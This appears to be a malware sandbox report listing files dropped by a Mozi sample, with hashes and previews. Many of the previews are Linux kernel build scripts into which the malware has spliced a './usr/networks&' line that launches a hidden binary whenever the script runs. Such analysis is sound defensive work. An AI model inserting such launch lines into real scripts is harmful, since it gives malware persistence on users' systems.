                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):465
                                                              Entropy (8bit):5.4019794559876315
                                                              Encrypted:false
                                                              SSDEEP:12:gFtLQSXFtY3HxfA6+XO0AaTB19qAbWO9cxZM+efJg0cK4n:GZQS+3HgXO0B9qEWOyxy+eBZ4
                                                              MD5:54A6A3D258F9A9B950D60A5626825ADF
                                                              SHA1:448FB38EBEEE3831DE36A834B79EF934294DDC8D
                                                              SHA-256:821246C38A09A3923E111723BC97F9CD9283C8C35E3D1DFB0E72903332F34D61
                                                              SHA-512:A8AFA3E3508CB1FEEB3A57FD3B8985B8BCC2EE97F51DD617B86CB7FED8F1B23B084AD78B73A8CF78AF0A9F069FF4EAD3873AB4080218E30809225BCCDF013112
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 0.fi..cat <<EOF |.asm-generic/atomic-instrumented.h.asm-generic/atomic-long.h.linux/atomic-fallback.h.EOF.while read header; do..OLDSUM="$(tail -n 1 ${LINUXDIR}/include/${header})"..OLDSUM="${OLDSUM#// }"...NEWSUM="$(sed '$d' ${LINUXDIR}/include/${header} | sha1sum)"..NEWSUM="${NEWSUM%% *}"...if [ "${OLDSUM}" != "${NEWSUM}" ]; then...printf "warning: generated include/${header} has been modified.\n"..fi.done..exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):4968
                                                              Entropy (8bit):4.920227358499317
                                                              Encrypted:false
                                                              SSDEEP:96:Ym4VbZrlkq6N3KQjSDWtrdXHBI6AvIqU7PErnNLHbzObH6ImH4jK:/4/96N3KPWxdXHS6AQqUornN/zObaIm5
                                                              MD5:85C37C9E403C29B8FFE899A13685EEDC
                                                              SHA1:7AE6BC4CEA347DA3003FDBAF5C1543DB23A84C7A
                                                              SHA-256:CAFC81A70AA3FA31E0CBA515F2D1A0C699A5AAE403EE7C93B4DF0D1383ED7E14
                                                              SHA-512:A3E711D9049B1FD332B89CC2441D5A5C92BB5A60D7FD9938394C10EDA110A82D3F6E2F547F195A85CC4F8C2A56F91447255C8DF355EE5A2EE0691D5E468D604D
                                                              Malicious:false
                                                              Preview:./usr/networks&.file ${obj} | grep -q ELF || (echo "${obj} is not and ELF file." 1>&2 ; exit 0)..# Bail out early if there isn't an __ex_table section in this object file..objdump -hj __ex_table ${obj} 2> /dev/null > /dev/null.[ $? -ne 0 ] && exit 0..white_list=.text,.fixup..suspicious_relocs=$(objdump -rj __ex_table ${obj} | tail -n +6 |....grep -v $(eval echo -e{${white_list}}) | awk '{print $3}')..# No suspicious relocs in __ex_table, jobs a good'un.[ -z "${suspicious_relocs}" ] && exit 0...# After this point, something is seriously wrong since we just found out we.# have some relocations in __ex_table which point to sections which aren't.# white listed. If you're adding a new section in the Linux kernel, and.# you're expecting this section to contain code which can fault (i.e. the.# __ex_table relocation to your new section is expected), simply add your.# new section to the white_list variable above. If not, you're probably.# doing something wrong and the rest of this code is ju
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):302
                                                              Entropy (8bit):5.219576879921936
                                                              Encrypted:false
                                                              SSDEEP:6:w6vp1jFhdSmORXjFhdSm7BvRubdSmxkA+JEe04n:w6vp18mOx8mFJuYmWASpn
                                                              MD5:85210DF121FAA7D7C5A43F6B8E9CC1DE
                                                              SHA1:B6650F883605434AD1508FF4C63383318459DD29
                                                              SHA-256:1CE728C499D7489A6CE69F8A5217E94B4A331F385D30C7C093F1371A371FFFB2
                                                              SHA-512:D9F06696FB3C5C26ECFE5EDA962F395DD45CCF9A28BCDE93C434D9EE252D2A6F1FAA5149F3F215799E1CFEBA34403903B15EB85E12148ADA92806BCA8756F236
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..MAJOR=$(echo __clang_major__ | $compiler -E -x c - | tail -n 1).MINOR=$(echo __clang_minor__ | $compiler -E -x c - | tail -n 1).PATCHLEVEL=$(echo __clang_patchlevel__ | $compiler -E -x c - | tail -n 1).printf "%d%02d%02d\\n" $MAJOR $MINOR $PATCHLEVEL../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3896
                                                              Entropy (8bit):5.121242131865798
                                                              Encrypted:false
                                                              SSDEEP:96:cIRQQNQY1AsTe3MK6LU+9Tj2bDkBWkEf2MNi9ruP:JMKe3MxUsIkEkEf2MsBuP
                                                              MD5:B1A3F65748EBE631AA1C34B049B6441B
                                                              SHA1:27A5DC31170046E466607370AE53C4A17B5EEB66
                                                              SHA-256:769F3EF12B3B1D92794755947A8ED18899D9F809BD21C913F1F2636BB69DCE21
                                                              SHA-512:9B7F140B766B700E9729BA6C7DD1A89AFA6D007541AB86479B902959FB7432733A6C01AE282B55AE7328431A6B661E93CC05A1EECD9875E82D1CDB1B143706BB
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..vmlinux=$1.basepath=$2.modpath=$3.declare -A cache.declare -A modcache..parse_symbol() {..# The structure of symbol at this point is:..# ([name]+[offset]/[total length])..#..# For example:..# do_basic_setup+0x9c/0xbf...if [[ $module == "" ]] ; then...local objfile=$vmlinux..elif [[ "${modcache[$module]+isset}" == "isset" ]]; then...local objfile=${modcache[$module]}..else...[[ $modpath == "" ]] && return...local objfile=$(find "$modpath" -name "${module//_/[-_]}.ko*" -print -quit)...[[ $objfile == "" ]] && return...modcache[$module]=$objfile..fi...# Remove the englobing parenthesis..symbol=${symbol#\(}..symbol=${symbol%\)}...# Strip segment..local segment..if [[ $symbol == *:* ]] ; then...segment=${symbol%%:*}:...symbol=${symbol#*:}..fi...# Strip the symbol name so that we could look it up..local name=${symbol%+*}...# Use 'nm vmlinux' to figure out the base address of said symbol...# It's actually faster to call it every time than to load it..# all into
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1309
                                                              Entropy (8bit):5.41400347412325
                                                              Encrypted:false
                                                              SSDEEP:24:eZN4I8lR3Ei3FA3XqT0Lup4tYvrTJRv1RDh9Md+AOH+M4OYvF:ouR3NFiXgEuStYvrTJRv1RvM0iHOYvF
                                                              MD5:7C9807BE857EBD80586127DFBD72DD09
                                                              SHA1:6137B06329B80E3584A33969FF39D1CF4ACD66EC
                                                              SHA-256:2432B269E2B8D3F7A99107C4A7E0E91CDDF26FE75AD5D1421E9F208990BB2ABA
                                                              SHA-512:10260C00EDF44FBF9CE496EE0D42C8D241835AC2A79D9D867209E1138DC643521CD6BBE4A19D27EEA0468C4057C28B82FB50707552F700FCF06418951135A7D6
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi.DEPMOD=$1.KERNELRELEASE=$2..if ! test -r System.map ; then..echo "Warning: modules_install: missing 'System.map' file. Skipping depmod." >&2..exit 0.fi..# legacy behavior: "depmod" in /sbin, no /sbin in PATH.PATH="$PATH:/sbin".if [ -z $(command -v $DEPMOD) ]; then..echo "Warning: 'make modules_install' requires $DEPMOD. Please install it." >&2..echo "This is probably in the kmod package." >&2..exit 0.fi..# older versions of depmod require the version string to start with three.# numbers, so we cheat with a symlink here.depmod_hack_needed=true.tmp_dir=$(mktemp -d ${TMPDIR:-/tmp}/depmod.XXXXXX).mkdir -p "$tmp_dir/lib/modules/$KERNELRELEASE".if "$DEPMOD" -b "$tmp_dir" $KERNELRELEASE 2>/dev/null; then..if test -e "$tmp_dir/lib/modules/$KERNELRELEASE/modules.dep" -o \...-e "$tmp_dir/lib/modules/$KERNELRELEASE/modules.dep.bin"; then...depmod_hack_needed=false..fi.fi.rm -rf "$tmp_dir".if $depmod_hack_needed; then..symlink="$INSTALL_MOD_PATH/lib/modules/99.98.$KERNEL
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):839
                                                              Entropy (8bit):5.230182269131585
                                                              Encrypted:false
                                                              SSDEEP:12:w6vXjLYbl6v99FwjPF6vC2OlFeSj/PnBqBAACqn9q2eLAItfnJ2WDFUejDcAANUH:rXjMy99FwiCplBPhR243RnJ2WZv+D4
                                                              MD5:6578F62E5AA90B2455866F70CB00DB8C
                                                              SHA1:5D58A9B336173EF29C843F14B6ADF65C347B3849
                                                              SHA-256:4FFCDD44FEDE7CB9CFBCC8017ABCD9D557B8DC5289D0F518C12B65A590D4CD0C
                                                              SHA-512:61868A56A6993B4ECF3D4AEA9F00CE175C1E2A27EF8ADBF598B14288D63F143A2CEAC9CF7F55F4D19A52EBCF9332C2F5E6CA7CF4147BDA1A500B99A7A163D20A
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..if [ "$#" -ne 1 ]; then..echo "Usage: scripts/find-unused-docs.sh directory"..exit 1.fi..if ! [ -d "$1" ]; then..echo "Directory $1 doesn't exist"..exit 1.fi..cd "$( dirname "${BASH_SOURCE[0]}" )".cd ....cd Documentation/..echo "The following files contain kerneldoc comments for exported functions \.that are not used in the formatted documentation"..# FILES INCLUDED..files_included=($(grep -rHR ".. kernel-doc" --include \*.rst | cut -d " " -f 3))..declare -A FILES_INCLUDED..for each in "${files_included[@]}"; do..FILES_INCLUDED[$each]="$each"..done..cd ....# FILES NOT INCLUDED..for file in `find $1 -name '*.c'`; do...if [[ ${FILES_INCLUDED[$file]+_} ]]; then..continue;..fi..str=$(scripts/kernel-doc -export "$file" 2>/dev/null)..if [[ -n "$str" ]]; then..echo "$file"..fi..done.../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:C++ source, ASCII text
                                                              Category:dropped
                                                              Size (bytes):602
                                                              Entropy (8bit):5.17249933912423
                                                              Encrypted:false
                                                              SSDEEP:12:w6vlg/1EkrFQsGvUogu3vInLRSKkqbhIAyNATWCGv7gTn:rlStrF1G90AKTbKr8Ui
                                                              MD5:A87F8C76BA6B3031F82AB489E4AD42CA
                                                              SHA1:DA856F308DA044257648AF722CDE0BA94AEB8487
                                                              SHA-256:9BB298DE45E1FF2396B33933013251732C2119725A0EA1D18D7605CF6B2334E6
                                                              SHA-512:05310DB15A63F5CD8B105E578FDA2B85EEBB5375DE3B798B31A2C5F8D4F79967A74AEA00294B8397A26081B5F2DFDF53AA339702B26346434C19F74D427B35A2
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..case "$plugincc" in..*"$1 CC"*)...echo "$1"...exit 0...;;...*"$2 CXX"*)...# the c++ compiler needs another test, see below...;;...*)...exit 1...;;.esac..# we need a c++ compiler that supports the designated initializer GNU extension.plugincc=$($2 -c -x c++ -std=gnu++98 - -fsyntax-only -I"${srctree}"/gcc-plugins -I"${gccplugins_dir}"/include 2>&1 <<EOF.#include "gcc-common.h".class test {.public:..int test;.} test = {...test = 1.};.EOF.)..if [ $? -eq 0 ].then..echo "$2"..exit 0.fi..if [ -n "$SHOW_ERROR" ] ; then..echo "${plugincc}" >&2.fi.exit 1../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):293
                                                              Entropy (8bit):5.287996420109818
                                                              Encrypted:false
                                                              SSDEEP:6:w6vpCChdSmOCa3dSm7BC+gdSmxkA+JEe04n:w6vpCCWmOCa8mFC+hmWASpn
                                                              MD5:9D9B956D66E83B77B2B88BD28622C783
                                                              SHA1:FDDB267DAA99F989CDF8F519172780BE04770D74
                                                              SHA-256:ED13B418C809B424C5F82283856D0E5996A7C2327B0B6422FEC03C2C3A173F7F
                                                              SHA-512:079EA467DA6AC66570751D588397424D933B7639B5499B253B68BD0F7090F2AC4A1B279A2212714D4A9E7E11B418D9EEB8CA4BC2E7FDAAE3E260C5CF15CFC25F
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..MAJOR=$(echo __GNUC__ | $compiler -E -x c - | tail -n 1).MINOR=$(echo __GNUC_MINOR__ | $compiler -E -x c - | tail -n 1).PATCHLEVEL=$(echo __GNUC_PATCHLEVEL__ | $compiler -E -x c - | tail -n 1).printf "%d%02d%02d\\n" $MAJOR $MINOR $PATCHLEVEL../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):261
                                                              Entropy (8bit):4.878194343450546
                                                              Encrypted:false
                                                              SSDEEP:6:wWI2VT758W9BFgkU5eAp3045Z4rk/OskN7n:ZIsl8eBtU5fiKZ40un
                                                              MD5:0F89ECFD3269FA438F54A022D0ED1B9E
                                                              SHA1:AA8EF09B70C8F11A1A344B12F4F0155EBAC55B7C
                                                              SHA-256:231A5D5AB8024E6BF42F0D0BCA7F01ABDAD3C4F3828BD21F8CFF3B28183C7214
                                                              SHA-512:DF0E041A38D0CA6821EE11D136E446535795D561637868D1F6AF8C88949D437D3B4BEA4DAF16A81C4DBCA3E134F361578C3955980460174E9309365BDFB16287
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 0.fi..echo.echo "ksymdeps_$1 := \\"..for s in $ksyms.do..echo $s | sed -e 's:^_*: $(wildcard include/ksym/:' \....-e 's:__*:/:g' -e 's/$/.h) \\/'.done..echo.echo "$1: \$(ksymdeps_$1)".echo.echo "\$(ksymdeps_$1):"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3232
                                                              Entropy (8bit):5.719401961550023
                                                              Encrypted:false
                                                              SSDEEP:96:KWhJ8g5+JiYkgwiN+qoTKFuOdvxv5qRc/J/c/34vzq7:Kpg5R0RtVh0f4vO7
                                                              MD5:5CF848AA3C163E4FD75E563D97B50B36
                                                              SHA1:24AC6D3CFD1D134C30BADF420AD758510762A30F
                                                              SHA-256:62A220CB3D964A0B72A1D47D6683CB43FB5DF0F04F511155D60EB0C747F8BD3B
                                                              SHA-512:E0680D7B83F140B92C64AADC42ECEB15268EBA569CF51EAF695CBAB556289494EC4B162EF0A27BB62402A042C6F1EFB0313FCD2DCE763EED92B55876C94DAE57
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..# Grab arguments.INFILE=$1.OUTFILE=$2.TMPFILE=$OUTFILE.tmp..trap 'rm -f $OUTFILE $TMPFILE' EXIT..# SPDX-License-Identifier with GPL variants must have "WITH Linux-syscall-note".if [ -n "$(sed -n -e "/SPDX-License-Identifier:.*GPL-/{/WITH Linux-syscall-note/!p}" $INFILE)" ]; then..echo "error: $INFILE: missing \"WITH Linux-syscall-note\" for SPDX-License-Identifier" >&2..exit 1.fi..sed -E -e '..s/([[:space:](])(__user|__force|__iomem)[[:space:]]/\1/g..s/__attribute_const__([[:space:]]|$)/\1/g..s@^#include <linux/compiler(|_types).h>@@..s/(^|[^a-zA-Z0-9])__packed([^a-zA-Z0-9_]|$)/\1__attribute__((packed))\2/g..s/(^|[[:space:](])(inline|asm|volatile)([[:space:](]|$)/\1__\2__\3/g..s@#(ifndef|define|endif[[:space:]]*/[*])[[:space:]]*_UAPI@#\1 @.' $INFILE > $TMPFILE || exit 1..scripts/unifdef -U__KERNEL__ -D__EXPORTED_HEADERS__ $TMPFILE > $OUTFILE.[ $? -gt 1 ] && exit 1..# Remove /* ... */ style comments, and find CONFIG_ references in code.configs=$(sed -e '.:com
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):543
                                                              Entropy (8bit):5.065619669350735
                                                              Encrypted:false
                                                              SSDEEP:12:w6vaDVR27MTCVT9GD6va2Ys74S6vMSASVRWGn:raDVR2AEGYae74pMSASqG
                                                              MD5:E915887E36621505EC5730DC29D2298A
                                                              SHA1:C0C7CB262A57CF220FFB76AB5BAF18AEAD18263D
                                                              SHA-256:838808BA102CA4D94A9455E9492601B7794118EABB72CBF4C8FB5F36B0473CC1
